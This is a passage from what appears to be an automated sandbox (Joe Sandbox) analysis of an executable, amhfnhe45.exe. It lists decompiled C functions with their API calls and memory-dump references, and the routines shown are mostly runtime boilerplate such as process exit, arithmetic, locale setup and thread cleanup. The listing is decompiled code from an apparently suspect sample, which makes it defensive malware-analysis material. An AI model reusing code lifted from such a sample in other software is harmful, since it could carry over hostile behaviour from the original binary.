0x00411513
0x00411523
0x00411523
0x0041152b
0x0041152d
0x0041152d
0x00411533
0x00411535
0x00411537
0x00411540
0x00411540
0x00411543
0x00411543
0x00411549
0x0041154f
0x00411555
0x0041155c
0x00411562
0x00411569
0x00411564
0x00411564
0x00411564
0x00411557
0x00411557
0x00411557
0x0041154b
0x0041154b
0x0041154b
0x0041156f
0x00411574
0x00411577
0x00411579
0x0041157a
0x0041157b
0x0041157d
0x00411581
0x00411581
0x00411584
0x00411587
0x00411589
0x0041158c
0x00411593
0x00411596
0x00411597
0x0041159a
0x0041159f
0x00411520
0x00411520
0x00000000
0x00411520
0x00000000
0x0041159f
0x00411523
0x004115a5
0x004115a5
0x004115a8
0x004115ac
0x004115b0
0x004115b0
0x004115b4
0x004115b4
0x004115b6
0x004115b9
0x004115be
0x00000000
0x00000000
0x004115c0
0x004115c3
0x00000000
0x00000000
0x00000000
0x004115c3
0x004115c5
0x004115c5
0x004115ce
0x004115d4
0x004115dc
0x004114ef
0x004114f5
0x00000000
0x00000000
0x004114f9
0x00411506
0x00411506
0x004114ed

APIs

isxdigit.NTDLL(00000000,00000000,00000000,00000000,?,?,00414DE4,00000000,95667250209D992A05553BDF8CB0E1320B04B2E0FF9177FE88C32CF125FEA249), ref: 00411456
isxdigit.NTDLL(?,?,?,?,00414DE4,00000000,95667250209D992A05553BDF8CB0E1320B04B2E0FF9177FE88C32CF125FEA249), ref: 00411467

Strings

MA, xrefs: 00411581
MA, xrefs: 00411429, 00411520

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004266A5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

C-Code - Quality: 100%

			E004266A5(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}

0x004266af
0x004266b7
0x004266bf
0x004266c7
0x00000000
0x004266cc
0x004266c7
0x004266cf

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,?,004266DD,00000000,?,0042594C,000000FF,0000001E,00000001,00000000,00000000,?,0042D12B,00000000,00000001,00000000), ref: 004266AF
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004266DD,00000000,?,0042594C,000000FF,0000001E,00000001,00000000,00000000,?,0042D12B,00000000,00000001), ref: 004266BF

Strings

mscoree.dll, xrefs: 004266AA
CorExitProcess, xrefs: 004266B9

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004031A0, Relevance: 6.2, APIs: 4, Instructions: 194

C-Code - Quality: 83%

			E004031A0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				signed int _v40;
				signed int _t71;
				void* _t72;
				signed int _t74;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t98;
				void* _t99;
				intOrPtr _t100;
				void* _t105;
				signed int _t121;
				signed int _t125;
				signed int _t133;
				intOrPtr _t134;
				void* _t135;
				intOrPtr _t136;
				signed int _t141;
				signed int _t142;

				_t120 = __edx;
				_t71 = _a20;
				_t133 = _a24;
				_v40 = 0;
				_v8 = 2;
				if((_t71 | _t133) != 0) {
					_t72 = E0040D310(_t71, _t133);
					_t141 = _a8;
					_t98 = 0x40 - _t72;
					__eflags = _t141 - _t133;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L5:
							_t9 =  &_a4;
							 *_t9 = _a4 - _a20;
							__eflags =  *_t9;
							asm("sbb esi, edi");
							_a8 = _t141;
						} else {
							_t120 = _a4;
							__eflags = _t120 - _a20;
							if(_t120 >= _a20) {
								goto L5;
							}
						}
					}
					__eflags = _t98;
					if(_t98 != 0) {
						L004305EE();
						_a24 = _t133;
						L004305E8();
						_v16 = _a16;
						L004305EE();
						_t93 = _v16 | _t141;
						__eflags = _t93;
						_t120 = _a16;
						_a8 = _t93;
						_a4 = _a12 | _a4;
						L004305EE();
						L8:
						_t141 = _a8;
						_t133 = _a24;
						_a16 = _t120;
					}
					__eflags = _t141 - _t133;
					if(_t141 != _t133) {
						L12:
						_t99 = 0;
						__eflags = 0;
						_t74 = E00429DD0(_a4, _t141, _t133, 0);
						_v20 = _t74;
						_v16 = _t120;
						_t142 = _t74;
					} else {
						_t99 = 0;
						__eflags = 0;
						if(0 != 0) {
							goto L12;
						} else {
							_t142 = _t141 | 0xffffffff;
							_v16 = 0;
						}
					}
					_t121 = _v16;
					_t134 = E004304B0(_t142, _t121, _t133, _t99);
					_t100 = _t121;
					_v28 = E004304B0(_t142, _v16, _a20, 0);
					_t105 = _a4 - _t134;
					_v24 = _t121;
					asm("sbb eax, ebx");
					__eflags = _a8;
					if(_a8 == 0) {
						while(1) {
							_t88 = _a16;
							__eflags = _v24 - _t105;
							if(__eflags < 0) {
								goto L18;
							}
							if(__eflags > 0) {
								L17:
								asm("adc dword [ebp-0xc], 0xffffffff");
								_t136 = _t134 - _a24;
								asm("sbb ebx, ecx");
								_v28 = _v28 - _a20;
								_v20 = _t142 + 0xffffffff;
								asm("sbb [ebp-0x14], ecx");
								_t105 = _a4 - _t136;
								_v36 = _t136;
								asm("sbb esi, ebx");
								__eflags = _a8;
								_t142 = _v20;
								_t134 = _v36;
								if(_a8 == 0) {
									continue;
								}
							} else {
								__eflags = _v28 - _t88;
								if(_v28 > _t88) {
									goto L17;
								}
							}
							goto L18;
						}
					}
					L18:
					_t135 = _t134 + _v24;
					asm("adc ebx, ecx");
					__eflags = _a16 - _v28;
					if(__eflags <= 0) {
						if(__eflags < 0) {
							L21:
							_t135 = _t135 + 1;
							asm("adc ebx, ecx");
						} else {
							__eflags = _a12;
							if(_a12 < 0) {
								goto L21;
							}
						}
					}
					_a12 = _a12;
					_t125 = _a16;
					asm("sbb edx, eax");
					_t82 = _a4;
					__eflags = _a8 - _t100;
					if(__eflags <= 0) {
						if(__eflags < 0) {
							L25:
							_t82 = _t82 + _a20;
							asm("adc ecx, [ebp+0x1c]");
							_t142 = _t142 + 0xffffffff;
							asm("adc dword [ebp-0xc], 0xffffffff");
						} else {
							__eflags = _t82 - _t135;
							if(_t82 < _t135) {
								goto L25;
							}
						}
					}
					_t62 =  &_v8;
					 *_t62 = _v8 - 1;
					__eflags =  *_t62;
					if( *_t62 != 0) {
						_v40 = _t142;
						_t120 = _a12;
						_a8 = _t82 - _t135;
						_a4 = _t125;
						_a12 = 0;
						goto L8;
					}
					__eflags = _v16 | _v40;
					return _t142;
				} else {
					return _t71 | 0xffffffff;
				}
			}

0x004031a0
0x004031a8
0x004031ae
0x004031b5
0x004031bc
0x004031c3
0x004031d4
0x004031d9
0x004031e4
0x004031e6
0x004031e8
0x004031ea
0x004031f4
0x004031f7
0x004031f7
0x004031f7
0x004031fa
0x004031fc
0x004031ec
0x004031ec
0x004031ef
0x004031f2
0x00000000
0x00000000
0x004031f2
0x004031ea
0x004031ff
0x00403201
0x0040320a
0x00403215
0x00403222
0x0040322c
0x00403233
0x0040323d
0x0040323d
0x0040323f
0x00403242
0x0040324a
0x0040324d
0x00403255
0x00403255
0x00403258
0x0040325b
0x0040325b
0x00403262
0x00403264
0x00403274
0x00403277
0x00403277
0x0040327d
0x00403282
0x00403285
0x00403288
0x00403266
0x00403266
0x00403268
0x0040326a
0x00000000
0x0040326c
0x0040326c
0x0040326f
0x0040326f
0x0040326a
0x0040328a
0x00403296
0x004032a4
0x004032ae
0x004032b4
0x004032b6
0x004032b9
0x004032bd
0x004032bf
0x004032c1
0x004032c5
0x004032ca
0x004032cd
0x00000000
0x00000000
0x004032cf
0x004032d6
0x004032d9
0x004032dd
0x004032e2
0x004032e7
0x004032ec
0x004032ef
0x004032f8
0x004032fa
0x004032fd
0x00403301
0x00403303
0x00403306
0x00403309
0x00000000
0x00000000
0x004032d1
0x004032d1
0x004032d4
0x00000000
0x00000000
0x004032d4
0x00000000
0x004032cf
0x004032c1
0x0040330b
0x00403310
0x00403315
0x00403317
0x0040331a
0x0040331c
0x00403323
0x00403323
0x00403326
0x0040331e
0x0040331e
0x00403321
0x00000000
0x00000000
0x00403321
0x0040331c
0x00403328
0x0040332b
0x00403331
0x00403333
0x00403336
0x00403338
0x0040333a
0x00403340
0x00403340
0x00403343
0x00403346
0x00403349
0x0040333c
0x0040333c
0x0040333e
0x00000000
0x00000000
0x0040333e
0x0040333a
0x0040334f
0x0040334f
0x0040334f
0x00403352
0x00403354
0x0040335b
0x00403362
0x00403365
0x00403368
0x00000000
0x00403368
0x00403379
0x00403380
0x004031c5
0x004031d1
0x004031d1

APIs

_allshl.NTDLL ref: 0040320A
_aullshr.NTDLL ref: 00403222
_allshl.NTDLL ref: 00403233
_allshl.NTDLL ref: 0040324D

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A364, Relevance: 6.1, APIs: 4, Instructions: 116

C-Code - Quality: 96%

			E0042A364(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				LONG* _t73;
				intOrPtr _t89;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x43c1b0);
				E00428E80(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = E0042AA05(__ebx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				E0042A05B(__ebx, __edx, _t89, __esi, _t101);
				_t47 = E0042A0FF( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return E00428EC5( *(_t98 - 0x20));
				}
				_t73 = E0042D11A(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = E0042A17B(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x43f460;
						if(__eflags != 0) {
							E004258E3(_t73);
						}
						 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
						_t69 =  *(_t97 + 0x68);
						if( *(_t97 + 0x68) != 0x43f460) {
							E004258E3(_t69);
						}
					}
					 *(_t97 + 0x68) = _t73;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x43f980 & 0x00000001) == 0) {
						E0042B9FB(_t73, InterlockedIncrement, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x440e7c = _t73[1];
						 *0x440e80 = _t73[2];
						 *0x440e84 = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x440e70 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
							 *((char*)(_t62 + 0x43f680)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x43f788)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x43f888);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x43f888; // 0x14924f8
							__eflags = _t67 - 0x43f460;
							if(_t67 != 0x43f460) {
								E004258E3(_t67);
							}
						}
						 *0x43f888 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E0042A4C5();
					}
				}
			}

0x0042a364
0x0042a364
0x0042a364
0x0042a366
0x0042a36b
0x0042a370
0x0042a379
0x0042a37b
0x0042a37e
0x0042a389
0x0042a38e
0x0042a394
0x0042a4f1
0x0042a4f1
0x0042a4f1
0x0042a4f5
0x0042a4fd
0x0042a4fd
0x0042a3a5
0x0042a3a7
0x0042a3a9
0x00000000
0x00000000
0x0042a3b9
0x0042a3bb
0x0042a3c2
0x0042a3c9
0x0042a3ce
0x0042a4d0
0x0042a4d3
0x0042a4d5
0x0042a4db
0x0042a4de
0x0042a4e3
0x0042a4e9
0x0042a4e9
0x0042a3d4
0x0042a3d4
0x0042a3e2
0x0042a3e4
0x0042a3ec
0x0042a3ef
0x0042a3f4
0x0042a3ec
0x0042a3f5
0x0042a3ff
0x0042a405
0x0042a41a
0x0042a420
0x0042a427
0x0042a42f
0x0042a437
0x0042a43c
0x0042a43e
0x0042a43e
0x0042a444
0x00000000
0x00000000
0x0042a44b
0x0042a453
0x0042a453
0x0042a456
0x0042a456
0x0042a458
0x0042a458
0x0042a45b
0x0042a460
0x00000000
0x00000000
0x0042a466
0x0042a46c
0x0042a46c
0x0042a46f
0x0042a46f
0x0042a471
0x0042a471
0x0042a474
0x0042a479
0x00000000
0x00000000
0x0042a482
0x0042a488
0x0042a488
0x0042a491
0x0042a497
0x0042a499
0x0042a49b
0x0042a4a0
0x0042a4a5
0x0042a4a8
0x0042a4ad
0x0042a4a5
0x0042a4ae
0x0042a4b5
0x0042a4b7
0x0042a4be
0x0042a4be
0x0042a405

APIs

Part of subcall function 0042A05B: InterlockedDecrement.KERNEL32(?,0043C190,0000000C,00425F84,?,?,0042D410), ref: 0042A0B4
Part of subcall function 0042A05B: InterlockedIncrement.KERNEL32(014924F8,0043C190,0000000C,00425F84,?,?,0042D410), ref: 0042A0DF

Part of subcall function 0042A0FF: GetOEMCP.KERNEL32(00000000), ref: 0042A128
Part of subcall function 0042A0FF: GetACP.KERNEL32(00000000), ref: 0042A14B

Part of subcall function 0042D11A: Sleep.KERNEL32(00000000,00000001,00000000,?,0042B986,00000018,0043C2A8,0000000C,0042BA16,00000000,00000000,?,0042A922,0000000D), ref: 0042D13B

Part of subcall function 0042A17B: IsValidCodePage.KERNEL32(-00000030), ref: 0042A1EE
Part of subcall function 0042A17B: GetCPInfo.KERNEL32(00000000,?), ref: 0042A201

InterlockedDecrement.KERNEL32(?,?,?,?,?,?,?,?,0043C1B0,00000014), ref: 0042A3DA
InterlockedIncrement.KERNEL32(00000000,?,?,?,?,?,?,?,0043C1B0,00000014), ref: 0042A3FF

Part of subcall function 0042B9FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0042A922,0000000D), ref: 0042BA25

InterlockedDecrement.KERNEL32 ref: 0042A491
InterlockedIncrement.KERNEL32(00000000), ref: 0042A4B5

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32 ref: 0042590B

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041CE49, Relevance: 6.1, APIs: 4, Instructions: 75

C-Code - Quality: 22%

			E0041CE49(void* __ebx, void* __ebp, void* _a20, char* _a28, char _a68, intOrPtr* _a76, intOrPtr _a80, struct _MEMORYSTATUS _a160, char _a1040, signed int _a2164) {
				void* __edi;
				intOrPtr* _t18;
				intOrPtr _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				intOrPtr* _t27;
				void* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				signed int _t49;
				long long* _t50;
				long long* _t52;
				long long* _t53;
				long long _t62;

				_t34 = __ebx;
				do {
					_t62 =  *0x43bed0;
					_t50 = _t49 - 8;
					 *_t50 = _t62;
					E0041C8B0(_a1040,  &_a1040);
					_t43 = _a28;
					_t49 = _t50 + 8;
					_push( &_a1040);
					_push(_a28);
				} while (_a80() != 0 && GetTickCount() < _t34);
				_t18 = _a76;
				if(_t18 == 0) {
					_t43 = _a20;
					CloseHandle(_a20);
				} else {
					 *_t18(_a20);
				}
				FreeLibrary(_t44);
				E0041CF50(_t62);
				GlobalMemoryStatus( &_a160);
				_t23 =  *0x462890; // 0x0
				if(_t23 == 0) {
					_t23 = 0x440288;
					 *0x462890 = 0x440288;
				}
				_t10 = _t23 + 0xc; // 0x41c0d0
				_t24 =  *_t10;
				if(_t24 != 0) {
					asm("fld1");
					_t53 = _t49 - 8;
					 *_t53 = _t62;
					 *_t24( &_a160, 0x20);
					_t49 = _t53 + 0x10;
				}
				_a68 = GetCurrentProcessId();
				_t26 =  *0x462890; // 0x0
				if(_t26 == 0) {
					_t26 = 0x440288;
					 *0x462890 = 0x440288;
				}
				_t13 = _t26 + 0xc; // 0x41c0d0
				_t27 =  *_t13;
				if(_t27 != 0) {
					asm("fld1");
					_t52 = _t49 - 8;
					 *_t52 = _t62;
					_t43 =  &_a68;
					 *_t27( &_a68, 4);
					_t49 = _t52 + 0x10;
				}
				_pop(_t45);
				_pop(_t46);
				_pop(_t35);
				return E004256FE(1, _t35, _a2164 ^ _t49, _t43, _t45, _t46);
			}

0x0041ce49
0x0041ce50
0x0041ce50
0x0041ce5d
0x0041ce67
0x0041ce6a
0x0041ce6f
0x0041ce73
0x0041ce7d
0x0041ce7e
0x0041ce83
0x0041ce8d
0x0041ce93
0x0041ce9e
0x0041cea3
0x0041ce95
0x0041ce9a
0x0041ce9a
0x0041ceaa
0x0041ceb0
0x0041cebd
0x0041cec3
0x0041ceca
0x0041cecc
0x0041ced1
0x0041ced1
0x0041ced6
0x0041ced6
0x0041cedb
0x0041cedd
0x0041cedf
0x0041cee2
0x0041ceef
0x0041cef1
0x0041cef1
0x0041cefa
0x0041cefe
0x0041cf05
0x0041cf07
0x0041cf0c
0x0041cf0c
0x0041cf11
0x0041cf11
0x0041cf16
0x0041cf18
0x0041cf1a
0x0041cf1d
0x0041cf20
0x0041cf27
0x0041cf29
0x0041cf29
0x0041cf33
0x0041cf34
0x0041cf35
0x0041cf45

APIs

GetTickCount.KERNEL32 ref: 0041CE87
CloseHandle.KERNEL32(?), ref: 0041CEA3
FreeLibrary.KERNEL32(00000000), ref: 0041CEAA

Part of subcall function 0041CF50: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?), ref: 0041CF65
Part of subcall function 0041CF50: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0041CFAC

GlobalMemoryStatus.KERNEL32(?), ref: 0041CEBD
GetCurrentProcessId.KERNEL32 ref: 0041CEF4

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A89B, Relevance: 6.0, APIs: 4, Instructions: 50

C-Code - Quality: 58%

			E0042A89B() {
				signed int _t3;
				long _t4;
				struct _CRITICAL_SECTION* _t5;
				struct _CRITICAL_SECTION* _t14;
				signed int* _t17;
				struct _CRITICAL_SECTION** _t18;

				_t3 =  *0x43fbcc; // 0x4
				if(_t3 != 0xffffffff) {
					__imp__DecodePointer( *0x440e94, _t3);
					 *_t3();
					 *0x43fbcc =  *0x43fbcc | 0xffffffff;
				}
				_t4 =  *0x43fbd0; // 0x1b
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
					 *0x43fbd0 =  *0x43fbd0 | 0xffffffff;
				}
				_t17 = 0x43fc30;
				do {
					_t14 =  *_t17;
					if(_t14 != 0 && _t17[1] != 1) {
						DeleteCriticalSection(_t14);
						E004258E3(_t14);
						 *_t17 =  *_t17 & 0x00000000;
					}
					_t17 =  &(_t17[2]);
				} while (_t17 < 0x43fd50);
				_t18 = 0x43fc30;
				do {
					_t5 =  *_t18;
					if(_t5 != 0 && _t18[1] == 1) {
						DeleteCriticalSection(_t5);
					}
					_t18 =  &(_t18[2]);
				} while (_t18 < 0x43fd50);
				return _t5;
			}

0x0042a89b
0x0042a8a3
0x0042a8ac
0x0042a8b2
0x0042a8b4
0x0042a8b4
0x0042a8bb
0x0042a8c3
0x0042a8c6
0x0042a8cc
0x0042a8cc
0x0042b8d5
0x0042b8db
0x0042b8db
0x0042b8df
0x0042b8e8
0x0042b8eb
0x0042b8f0
0x0042b8f3
0x0042b8f4
0x0042b8f7
0x0042b8ff
0x0042b905
0x0042b905
0x0042b909
0x0042b912
0x0042b912
0x0042b914
0x0042b917
0x0042b921

APIs

DecodePointer.KERNEL32(00000004,0042ACC4,?,00426BF2), ref: 0042A8AC
TlsFree.KERNEL32(0000001B,0042ACC4,?,00426BF2), ref: 0042A8C6
DeleteCriticalSection.KERNEL32(00000000,00000000,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B8E8

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32 ref: 0042590B

DeleteCriticalSection.KERNEL32(0000001B,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B912

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A98C, Relevance: 6.0, APIs: 4, Instructions: 45

C-Code - Quality: 59%

			E0042A98C(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				long _t3;
				long* _t7;
				void* _t8;
				long _t11;
				void* _t18;
				long _t19;
				long* _t20;

				_t18 = __edx;
				_t3 = GetLastError();
				_push( *0x43fbcc);
				_t19 = _t3;
				_t20 =  *((intOrPtr*)(E0042A867()))();
				if(_t20 == 0) {
					_t7 = E0042D15F(1, 0x214);
					_t20 = _t7;
					if(_t20 != 0) {
						__imp__DecodePointer( *0x440e90,  *0x43fbcc, _t20);
						_t8 =  *_t7();
						_t23 = _t8;
						if(_t8 == 0) {
							E004258E3(_t20);
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t20);
							E0042A8D8(__ebx, _t18, _t19, _t20, _t23);
							_t11 = GetCurrentThreadId();
							_t20[1] = _t20[1] | 0xffffffff;
							 *_t20 = _t11;
						}
					}
				}
				SetLastError(_t19);
				return _t20;
			}

0x0042a98c
0x0042a990
0x0042a996
0x0042a99c
0x0042a9a5
0x0042a9a9
0x0042a9b2
0x0042a9b7
0x0042a9bd
0x0042a9cc
0x0042a9d2
0x0042a9d4
0x0042a9d6
0x0042a9f1
0x0042a9f7
0x0042a9f7
0x0042a9d8
0x0042a9d8
0x0042a9da
0x0042a9db
0x0042a9e2
0x0042a9e8
0x0042a9ec
0x0042a9ec
0x0042a9d6
0x0042a9bd
0x0042a9fa
0x0042aa04

APIs

GetLastError.KERNEL32(?,?,0042712A,00425909), ref: 0042A990

Part of subcall function 0042A867: TlsGetValue.KERNEL32(?,0042A9A3,?,?,0042712A,00425909), ref: 0042A870
Part of subcall function 0042A867: DecodePointer.KERNEL32(?,0042A9A3,?,?,0042712A,00425909), ref: 0042A882
Part of subcall function 0042A867: TlsSetValue.KERNEL32(00000000,?,0042A9A3,?,?,0042712A,00425909), ref: 0042A891

SetLastError.KERNEL32(00000000,?,?,0042712A,00425909), ref: 0042A9FA

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000), ref: 0042D187

DecodePointer.KERNEL32(00000000,?,?,0042712A,00425909), ref: 0042A9CC
GetCurrentThreadId.KERNEL32(?,?,0042712A,00425909), ref: 0042A9E2

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32 ref: 0042590B

Part of subcall function 0042A8D8: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C1F0,00000008,0042A9E0,00000000,00000000,?,?,0042712A,00425909), ref: 0042A8E9
Part of subcall function 0042A8D8: InterlockedIncrement.KERNEL32(?), ref: 0042A92A

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A8D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40

C-Code - Quality: 91%

			E0042A8D8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t40;
				void* _t41;

				_t31 = __ebx;
				_push(8);
				_push(0x43c1f0);
				E00428E80(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x432270;
				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x43f460;
				E0042B9FB(__ebx, 1, 0xd);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				InterlockedIncrement( *(_t40 + 0x68));
				 *(_t41 - 4) = 0xfffffffe;
				E0042A97A();
				E0042B9FB(_t31, 1, 0xc);
				 *(_t41 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x43fbc8; // 0x43faf0
					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
				}
				E0042A51C( *((intOrPtr*)(_t40 + 0x6c)));
				 *(_t41 - 4) = 0xfffffffe;
				return E00428EC5(E0042A983());
			}

0x0042a8d8
0x0042a8d8
0x0042a8da
0x0042a8df
0x0042a8e9
0x0042a8ef
0x0042a8f2
0x0042a8f9
0x0042a900
0x0042a903
0x0042a906
0x0042a90d
0x0042a914
0x0042a91d
0x0042a923
0x0042a92a
0x0042a930
0x0042a937
0x0042a93e
0x0042a944
0x0042a947
0x0042a94a
0x0042a94f
0x0042a951
0x0042a956
0x0042a956
0x0042a95c
0x0042a962
0x0042a973

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C1F0,00000008,0042A9E0,00000000,00000000,?,?,0042712A,00425909), ref: 0042A8E9

Part of subcall function 0042B9FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0042A922,0000000D), ref: 0042BA25

InterlockedIncrement.KERNEL32(?), ref: 0042A92A

Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(00000000,00000001,00000000,?,?,0042A961,?), ref: 0042A52E
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A53B
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A548
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A555
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A562
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A57E
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A58E
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A5A4

Strings

KERNEL32.DLL, xrefs: 0042A8E4

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Analysis Process: amhfnhe45.exe PID: 2748 Parent PID: 2732

Execution Graph

Execution Coverage

